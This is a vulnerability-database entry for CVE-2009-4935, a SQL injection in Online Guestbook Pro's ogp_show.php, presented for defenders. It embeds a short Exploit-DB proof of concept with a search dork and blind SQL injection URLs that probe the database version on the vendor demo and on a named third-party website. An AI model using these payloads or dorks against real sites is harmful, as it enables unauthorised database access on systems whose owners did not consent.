CVE-2009-4935

high

Published 2010-07-12 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

SQL injection vulnerability in ogp_show.php in Online Guestbook Pro allows remote attackers to execute arbitrary SQL commands via the display parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-14204 webapps php

L0rd CrusAd3r · 2010-07-04

Esoftpro Online Guestbook Pro - Multiple Vulnerabilities

Source code queued for fetch — refresh in a moment.

EDB-8475 webapps php verified text · 1 KB

Hussin X · 2009-04-17

Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection

text exploit Source: Exploit-DB

Online Guestbook Pro (display) Blind SQL Injection Vulnerability


{____________________________________}
 Author: Hussin X

 Home :  WwW.IQ-TY.CoM

 email:  darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php
 
DorK   : Powered by Online Guestbook Pro




Demo :

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4

BuT Results = Forbidden :D


demo to any web

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=4





Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.

# milw0rm.com [2009-04-17]

Application impact

Vendor	Product	Versions	Fixed
esoftpro	online_guestbook_pro

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.